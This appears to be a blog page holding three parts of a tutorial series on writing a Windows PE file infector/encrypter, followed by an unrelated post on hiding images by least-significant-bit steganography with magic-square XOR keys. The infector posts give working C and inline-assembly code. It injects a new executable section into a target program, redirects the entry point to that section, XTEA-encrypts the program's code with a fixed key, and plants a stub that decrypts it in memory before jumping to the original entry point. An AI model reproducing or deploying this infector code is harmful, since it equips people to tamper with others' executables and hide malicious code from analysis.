    char *str_virtualprotect;
    char *str_section_name;
    char *str_rdata_name;
    char *str_rsrc_name;
    PIMAGE_DOS_HEADER target_dos_header;
    int section_offset;
    int section_names_equal;
    unsigned long old_protections;
    pVirtualProtect virtualprotect_addr;
    __asm { //String initializations
        jmp virtualprotect
        virtualprotectback:
            pop esi
            mov str_virtualprotect, esi
        jmp section_name
        section_nameback:
            pop esi
            mov str_section_name, esi
        jmp rdata_name
        rdata_nameback:
            pop esi
            mov str_rdata_name, esi
        jmp rsrc_name
        rsrc_nameback:
            pop esi
            mov str_rsrc_name, esi
    }
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov target_dos_header, eax
        mov section_offset, 0x0
        mov section_names_equal, 0x0
        push str_virtualprotect
        push [ebp+0xC]
        call get_proc_address
        mov virtualprotect_addr, eax
    }
    PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
    for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
        section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
            (sizeof(IMAGE_SECTION_HEADER) * j));
        PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
        STRING_COMPARE(str_section_name, section_header)
        __asm mov section_names_equal, eax
        STRING_COMPARE(str_rdata_name, section_header)
        __asm add section_names_equal, eax
        STRING_COMPARE(str_rsrc_name, section_header)
        __asm add section_names_equal, eax
        if(section_names_equal == 0) {
            unsigned char *current_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
            unsigned char *last_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                + section_header->SizeOfRawData);
            const unsigned int num_rounds = 32;
            const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(current_byte; current_byte < last_byte; current_byte += 8) {
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                    (*(current_byte+2) << 8) | *(current_byte+3);
                unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                    (*(current_byte+6) << 8) | *(current_byte+7);
                unsigned int full_block[] = {block1, block2};
                unsigned int delta = 0x9E3779B9;
                unsigned int sum = (delta * num_rounds);
                for (unsigned int i = 0; i < num_rounds; ++i) {
                    full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                    sum -= delta;
                    full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                }
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                *(current_byte+3) = (full_block[0] & 0x000000FF);
                *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                *(current_byte+7) = (full_block[1] & 0x000000FF);
                *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
            }
        }
        section_names_equal = 0;
    }
    __asm {
        mov esp, ebp
        pop ebp
        ret 0x8
    }

The first thing to note is how string initialization is done. Each string has its own label at the bottom of the function, which performs a call back into after the jump. After this call instruction the raw bytes of the string are emitted. This means that when the call is performed, the return address pushed on the stack will be that of the first byte in the string. This means that back in the label that is called, the return address can be popped off and inserted into the appropriate string variable. What follows then is that the address of VirtualProtect is retrieved. This function will be used to give PAGE_EXECUTE_READWRITE permission to the block of bytes to be decrypted. This is needed since some sections do not have the appropriate read/write/execute permissions, and will cause a crash if they have an unallowed action performed on them. Eight bytes are read from the section in memory at a time and the decryption routine is performed on them. Sections named .rdata, .rsrc, and .inject are not decrypted. This is because .rdata and .rsrc were not encrypted intially, and because .inject is the section name of the injected code. The decrypted bytes are written into memory and the loop continues until all bytes have been decrypted.

The last thing that needs to be done is to jump back to the original entry point. This is done with the following code:

__asm { //Epilogue, stub exit point
    mov eax, target_image_base
    add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
    mov esp, ebp
    mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
    pop ebp
    popad                   //Restore thread context, with OEP in EAX
    jmp eax                 //Jump to OEP
}

In the epilogue of the code to inject, the load address is moved into EAX. Then the dummy value of 0xCCDDEEFF is added to it. This value actually serves as a signature and is replaced by the injector with the original entry point. This value is then moved into [ESP+0x20], which is where EAX is in the stack after the pushad and push ebp instructions. The stack frame is then destroyed and the registers are restored to what they would be if there was no injected code (except EAX now contains the original entry point). A jump is made to EAX and now execution can be returned to the normal application. Shown below are examples of how instructions look when the application starts. Notice that none of the instructions in the original entry point make sense (this is because they’re encrypted). After the stub finishes its decryption routine, the instructions are returned to normal.

Encrypted instructions in the .text section of the process. OllyDbg’s analysis on them couldn’t make any sense of it.

The decrypted code at the entry point of the program. This image was taken after the jump to the original entry point.

 

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will mainly focus on how to write content into a portable executable (PE) file. The code shown consists of excerpts from the file infector and explanations as to the usage and functionality. The material makes sense the most in context with the source code listing in part 4. Some good background reading and reference material is

  1. Microsoft PE and COFF specification
  2. An In-Depth Look into the Win32 Portable Executable File Format
  3. Inject your code to a Portable Executable

The third article is especially useful, but takes a much different approach to injecting code, and also does not work for applications that use randomized base addresses.

The general concept presented, and what is used in the file infector, is adding a new section to a PE file. The PE structure is best illustrated with tools such as LordPE. A PE file is organized into several structures. These hold offsets into the file for certain properties. This is best illustrated with a graphic

The IMAGE_DOS_HEADER structure (reproduced below) is shown in the graphic above

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

These match up with offsets in the file (e_magic is the first WORD in the file, e_cblp is the second WORD, and so on). The most important property here is e_lfanew. This is an offset to a different structure, IMAGE_NT_HEADERS (reproduced below):

typedef struct _IMAGE_NT_HEADERS {
  DWORD                 Signature;
  IMAGE_FILE_HEADER     FileHeader;
  IMAGE_OPTIONAL_HEADER OptionalHeader;
} IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS;

This structure contains two additional structures, IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER (reproduced below):

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

This structure holds all of the information that is needed to inject a section into a PE file: the needed file alignment, section alignment, the current number of sections, the size of the image, and so on. The last important structure that is required is IMAGE_SECTION_HEADER (reproduced below):

typedef struct _IMAGE_SECTION_HEADER {
  BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

This structure will contains all important information about a section in a PE file. It will basically be the structure that has to be (partially) filled out and then written into the file. It will be written following the last section and the value holding the number of sections in IMAGE_FILE_HEADER will be incremented and saved so this section is recognized.

The general idea then is to map the file to memory, find the appropriate structures (IMAGE_DOS_HEADER and IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER), and write our own IMAGE_SECTION_HEADER structure to the file.

The function to map a file to memory is shown below

bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}

This function takes in the target file name, a stub size which is the number of bytes to write into the file, an append mode flag which is used if the file is being modified, and a pfile_info structure which will be filled out upon a successful return. The append mode flag is needed because the target file needs to be opened twice: the first time to obtain the section alignment, and then a second time (after closing it), to write in the instructions with an aligned stub_size parameter. The function demonstrates a pretty straightforward use of the Windows API to perform mapping it into memory. The file_info structure is shown below:

typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;

Now since the file is mapped into memory, it is possible to obtain pointers to the appropriate structures. These can be obtained directly through typecasting the file buffer. An example of how to obtain them is shown below:

PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);

Once the file is mapped, it is possible to start adding the section. The code to add a section is shown below:

//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}

Understanding this function is pretty straightforward as it follows what was said above. It takes in the name of the new section, the size of the new section (aligned to IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.SectionAlignment), and address of the memory mapped file. The IMAGE_DOS_HEADER and IMAGE_NT_HEADERS structures are obtained and the properties in the IMAGE_NT_HEADERS structure are used to properly fill out a custom IMAGE_SECTION_HEADER structure. The last section in the file is obtained and a new one is made following it. This structure is the new section to be added. The important thing to note is that a lot of the properties need to be aligned. Once these properties are filled out, the size of the image is updated and the number of sections is incremented. Now the new section will be recognized. What is left to be done is to write the instructions that this section contains, and to change the entry point to point to this new section. Writing in the instructions is extremely simple:

void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}

Changing the file entry point is slightly more complicated, but not by much. It is simply a matter of finding where the new data is and performing a bit of math to get the correct offset to set as the new entry point.

void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}

And finally, the last thing to do is to encrypt the entire file, with the exception of the written stub (which includes the decryption routine), and the .rdata and .rsrc sections since they both only contain initialized data and resources respectively. The encryption routine that was used is the eXtended TEA (XTEA) block cipher. Every 8 bytes of program data is run through 32 rounds of the cipher and written to the file. The implementation is shown below:

void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}

With all that done, the file can be unmapped from memory and the changes saved with FlushViewOfFile.

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Background (1/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:53 PM

These next series of posts will focus on explaining a file infector/encrypter that I wrote a week ago or so. It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio’s C++ compiler to generate the assembly code to inject into the target. This allows for large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector and the decryption routine is written in to decrypt the file image at runtime. The series will be broken up into the four parts listed below:

  1. Background
  2. PE file modification/section injection
  3. Writing the compiled stub
  4. Full source code and remarks

Since this post will focus on the background of the project, there will be no (relevant) code contained in it. This post will discuss the high level concepts involved behind the infector, issues that arise while developing something like this, and provide an overview of the architecture of the infector. The usual warnings come with this article such as using it only to enhance your knowledge and to not be a script kiddie and rip the code to spread malware.

A file infector is simply an application that adds code to another process in hopes of executing that code. This code can itself be an infector which continues to spread to other files, or it can just be an arbitrary block of code with some defining purpose. Simply introducing code to a file is not enough though, as the normal control flow of the target process would never invoke it. Therefore, there are two main options: parts of the target file can be overwritten with a jump to the code, usually called a code cave. This includes variations such as writing itself into a subroutine and jumping to a block containing parts of the original code. The other option is to hijack the entry point the target file and modify it so the process starts up and immediately executes the desired code. The two techniques are illustrated below:

The original control flow of an application

The hijacked version, with a jump to what was an empty part of the process, but now would contain instructions to execute

The added instructions to be executed. The overwritten code is restored at the end and a jump returns control flow back to normal.

The other mentioned technique, modifying the entry point:

The entry point is an offset from the image base and denotes where the program begins execution. It is possible to take control of the application by modifying the entry point to point to the added code block, then jumping from the added code block to the original entry point. One thing to note though is that the ImageBase value is not always reliable, since applications linked with /DYNAMICBASE in Visual Studio (or whatever appropriate linker flag with different compilers) will have a “randomized” base address. This means that the jump back into the original entry point cannot have a hardcoded address (0x00400000 + 0x000153B7 in this case), but instead needs to be found by the injected code at runtime.

The next issue arises when the injected code wants to call any Windows API functions. Load addresses of kernel32.dll, ntdll.dll, and user32.dll are not guaranteed to always be the same, and DLLs such as Ws2_32.dll, Shlwapi.dll, and so on are not even guaranteed to be loaded. This means that call addresses to the Windows API cannot be hardcoded, and it also means that additional DLLs may have to be loaded in order to be their functionality. The good news it that since kernel32.dll is loaded into every process, its load added can be obtained from the process environment block (PEB). Then the export address table (EAT) of kernel32.dll can be walked and the address of LoadLibrary can be obtained to load additional DLLs. All exported functions in the DLL can be found through the function name table and through the usage of the function and ordinal table to obtain the address (more on this in part 3).

The last issue is that functions in the C runtime cannot be used. Again, this issue arises because of randomized base addresses — the address of the desired function simply cannot be hardcoded into the piece of code to be injected. This means that the functions will have to be implemented in assembly. This really isn’t too bad — for my version I only implemented strlen and a variation on strcmp, both needed when traversing the function name table.

The architecture of the infector has two main components: the injection function which will be injected into the target, and the code to map the file, add the code, modify the entry point, and so on. The injection function will be entirely self contained, and written in C and assembly. The C compiler will be leveraged to generate the assembly instructions that will be injected into the target. At runtime, the infector will calculate the length of the injection function, modify part of the function to insert the correct entry point offset, write the instructions into the target file, and lastly modify the entry point of the target file to execute the function upon loading. Lastly, the file will be encrypted. The role of the injection function is to decrypt the contents at runtime and continue normal execution.

A downloadable PDF of this post can be found here

January 23, 2011

Steganography with Magic Squares

Filed under: Cryptography — admin @ 11:36 AM

Steganography is “the art or practice of concealing a message, image, or file within another message, image, or file.” The general premise is that your message is in plain sight, but obscured by the fact that no one, except who you want, knows to look for it. An image file or a block of text looks more unsuspecting than something like 03b062766c06092b6926f84ef0c41ad434fdfb327b6ee80c8fff87cefa09590f2212bb82b6b5

aa027a17529deadb99b206e580a3625f8784726d308bb9d7afa3e8cd97d83fb8f6ed1111c2ce

c4b64a60a5deca3bbaeba1b3241bb13718779ddaf01cd511f74c5ca59d1a51f11171cb9221cea9

ed6aad68fa73d22568899d328e

which is a 1024-bit RSA ciphertext. Steganography can be performed in countless ways — from modifying bits in files to using invisible ink to write a message on a physical canvas. Steganography also has quite a history, going back to the times of ancient Greece. Herodotus wrote about Histiaeus shaving the head of his most trusted slave and tattooing a message on the slave’s bald head. When the slave’s hair regrew, the message would be concealed and the slave could be sent off without having to conceal any physical evidence of a message. The receiving end  of the message (Aristagoras) would either know of the messages existence, or the slave would be trusted to reveal it to him upon arrival. With the advent of the digital age, Steganography can take advantage of technology and become more widespread. Images, text documents, music files, or any seemingly common and innocent looking object can be taken advantage of to conceal a message. This can then be transmitted over the internet to knowing parties without anyone knowing — unless they are specifically looking for it. The sheer size of the internet makes steganographic messages very difficult (almost impossible?) to spot. Knowing that there are messages buried within the billions of images, or files in general, on the internet doesn’t really provide any sort of start on how to get those images. Also, once a steganographic message is found, it is very difficult to extract. If the message was not encoded naively, there is not much of a starting point. The message can be encoded in a way to still pass a chi-square test for randomness of bits so extracting a key or plaintext message would be difficult. The steganographic message itself can be ciphertext which yields even further complications. As a result, an analogue to cryptanalysis called steganalysis has been (and is being) developed to find and extract steganographic codes. Most of the techniques rely on statistical analysis to find unusual features in a message — which may go on to yield how it was encoded and allow for the original message to be deciphered.

I recently decided to make a program that would hide one image in another. This works by doing a simple least significant bit substitution. The four least significant bits (LSBs) of every RGB value in the source image would be substituted with the four most significant bits (MSBs) of the hidden image. This takes advantage of the fact that the the four LSB values do not encode a large range of colors — their range is 0 to 15, as opposed to 16 to 255 of the remaining four bits. The theory is then that you can take two pixels, line them up, and make a new pixel. This new pixel has the four MSBs of the original image, but has its four LSBs replaced by the four MSBs of the hidden image. This preserves most of the color range of the source image, and encodes the important part of the hidden image. Thus,

+  = 

Visually, the difference is very small, even at the pixel level. On a large scale, with the colors blending together, a normal image and one that contains a message is very difficult to spot. The program that I originally wrote to do the simple LSB substitution technique produced these two images.

Which one has the hidden message embedded inside?

The difference in color is extremely difficult to spot on this scope. No image artifacts are present unless someone is specifically looking for them. At first glance, no one would know that a message is hidden in one of those two images. Performing the bit extraction on the following two images produces these two resulting images:

Quite a surprising difference. The results go back to the wide range that the four MSBs can encode.

A problem is that extraction is quite simple. An obfuscation technique that I decided to incorporate into this was the use of magic squares. A magic square is an n x n matrix containing integers whose sum across the rows, columns, and diagonals all equal the same value. For example, the following magic square sums up to 65:

These squares are useful in that for odd numbered sizes there is a general formula to generate a number m at row i and column j. This provides for a linear time algorithm as a function of size and squares of any odd order can be quickly generated. Unfortunately, no formula exists for generating an even numbered square, so I avoided using them for this project. Sidenote: there are techniques to generate even squares in special forms. One of the interesting things about magic squares is the number of unique squares. Excluding rotations and reflections of a square, the number of unique square configurations is: 1, 0, 1, 880, 275305224, for n = 1 .. 5. For n >= 6 there is no known number of configurations. This provides an ample key space to choose from.

There are several ways that magic squares can be useful in steganography. Using a formula to generate a base magic square provides a unique encryption key. Alternatively, a magic square unique from the base square can be found and used as a key. This key can then be used to add a layer of encryption to the hidden data. For example, let the tile below be a 3×3 subsquare of a 9×9 square. A magic square key can then be applied by continually tiling squares over box pixel regions.

So the 9×9 square would be broken up into nine 3×3 squares and the exclusive-or operation applied to the MSB of the hidden image. The same square can then be used when extracting the hidden image. Alternatively, the square can be treated as a one dimensional array and each element will act as an exclusive-or value for each pixel in the hidden image. Taking it even further, the square can be continually rotated or reflected about axes so the key doesn’t show as much repetition, although these steps would also have to be encoded in the image unless the same type of rotation/reflection takes place at each step. There are no shortage of possibilities for unique usage of magic squares. One question may be that since only four bits per color are stored, why use any sized square with values > 15 (0b1111). The answer is that these squares can be extended to be used with any form of data — not just images. Larger sized squares might be useful when more data can be stored — perhaps at some block level instead of a byte level.

For simplicity, I chose to implement was a simple algorithm that treats a square as a one dimensional array and uses the four lowest bits of it as an XOR key against the MSBs of the hidden image. The result of extracting the four MSBs without knowing the key of the hidden image is shown below:

The result is significantly different without knowing the key. Extracting the four LSBs is not enough to give much information about the source image. The size of the square also affects how the resulting image will be viewed (which should be obvious). A longer key provides for more distortion across the image. A key of length is equal to or greater than the data to encrypt would provide the best results. Below are the result with magic squares of n = 7, 13, 17, and 51.

Overall, the technique is really simple to implement and there shouldn’t be stopping anyone from using a simple XOR-based encryption for extra security, at the very least.

A copy of this post is available as a downloadable PDF here.

Powered by WordPress